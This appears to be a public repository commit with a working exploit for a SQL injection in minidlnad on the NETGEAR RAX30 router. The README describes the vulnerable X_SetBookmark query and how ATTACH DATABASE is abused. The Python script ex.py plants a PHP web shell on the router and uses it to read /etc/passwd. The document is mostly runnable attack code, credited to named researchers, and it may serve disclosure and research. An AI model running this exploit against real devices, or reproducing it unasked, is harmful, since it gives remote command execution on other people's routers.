STRLCPY/rax30-sqlinj

Initial commit
Insu Yun committed 1 year ago

ee2657b0

■ ■ ■ ■ ■ ■

README.md

1	+	# NETGEAR Nighthawk WiFi6 Router (RAX30 AX2400) LAN Side Exploit
2	+
3	+	## How to reproduce
4	+
5	+	Run Python3 exploit code
6	+
7	+	```sh
8	+	$ python3 ex.py [Target IP Address]
9	+	```
10	+
11	+	## Details
12	+
13	+	`minidlnad` is running on TCP port 8200.
14	+	This daemon contains a SQL injection vulnerability while processing `X_SetBookmark`.
15	+
16	+	```c
17	+	...
18	+	if ( sub_191D8(
19	+	dword_57B50,
20	+	"INSERT OR REPLACE into BOOKMARKS VALUES ((select DETAIL_ID from OBJECTS where OBJECT_ID = '%q'), %q)",
21	+	v2,
22	+	v3) )
23	+	...
24	+	```
25	+
26	+	Using SQL injection, we can execute arbitrary SQL queries, including `ATTACH DATABASE` statement.
27	+	We can create database whose file extension is `php` and content has php web shell code.
28	+
29	+	## Credit
30	+	- Zachary Cutlip (@zcutlip): Original discovery
31	+	- Insu Yun, Seunghyun Kim, Gyeongwon Kim: Exploit writing
32	+

■ ■ ■ ■ ■ ■

ex.py

1	+	from urllib import parse
2	+
3	+	import socket
4	+	import sys
5	+
6	+	def do_cmd(ip, name, cmd):
7	+	cmd = parse.quote(cmd)
8	+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
9	+	s.connect((ip, 80))
10	+	req = f"""GET /shares/{name}.php?cmd={cmd} HTTP/1.1
11	+	Host: {ip}
12	+
13	+	"""
14	+	req = req.replace("\n", "\r\n")
15	+	req = req.encode()
16	+	s.send(req)
17	+	data = b""
18	+	while b"content-length: " not in data.lower():
19	+	data += s.recv(0x1000)
20	+	content_length = int(data.lower().split(b"content-length: ", 1)[1].split(b'\r\n', 1)[0])
21	+	data = data.split(b'\r\n\r\n', 1)[1]
22	+	content_length -= len(data)
23	+	while content_length > 0:
24	+	temp = s.recv(0x1000)
25	+	data += temp
26	+	content_length -= len(temp)
27	+
28	+	result = data.split(b"aaaa", 1)[1].rsplit(b"bbbb", 1)[0]
29	+	print(result.decode())
30	+	s.close()
31	+
32	+
33	+	def main(ip, port):
34	+	table = "shell"
35	+
36	+	payload = 'aaaa<?php system($_GET["cmd"]); ?>bbbb'
37	+	payload = 'char(' + ','.join([hex(ord(c)) for c in payload]) + ')'
38	+	query = [
39	+	f'ATTACH DATABASE "/webs/shares/{table}.php" AS {table}',
40	+	f'CREATE TABLE {table}.pwn (dataz text)',
41	+	f'INSERT INTO {table}.pwn (dataz) VALUES ({payload})'
42	+	]
43	+
44	+	query = "2);%s;--" % ';'.join(query)
45	+	assert(not "'" in query)
46	+
47	+	body = f"""
48	+	<?xml version="1.0" encoding="utf-8" ?>
49	+	<soap:Envelope>
50	+	<soap:Body>
51	+	<ObjectID>1<ObjectID>
52	+	<PosSecond>{query}<PosSecond>
53	+	</soap:Body>
54	+	</soap:Envelope>
55	+	"""
56	+
57	+	header = f"""POST / HTTP/1.1
58	+	Content-Type: text/xml; charset=utf-8
59	+	SOAPAction: #X_SetBookmark
60	+	Content-Length: {len(body)}
61	+
62	+	"""
63	+
64	+	req = header.replace("\n", "\r\n") + body
65	+	req = req.encode()
66	+
67	+	print("[*] Create web shell")
68	+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
69	+	s.connect((ip, port))
70	+	s.send(req)
71	+	s.recv(0x1000)
72	+	s.close()
73	+	print(f"[*] Now you can use webshell via `http://{ip}/shares/{table}.php?cmd=[your shell command]`")
74	+	print("[*] Print `cat /etc/passwd` result")
75	+
76	+	do_cmd(ip, table, "cat /etc/passwd")
77	+
78	+
79	+	if __name__ == "__main__":
80	+	if len(sys.argv) < 2:
81	+	print(f"Usage: python3 {sys.argv[0]} <IP address>", file=sys.stderr)
82	+	exit()
83	+	# minidlnad port: 8200
84	+	main(sys.argv[1], 8200)
85	+

Initial commit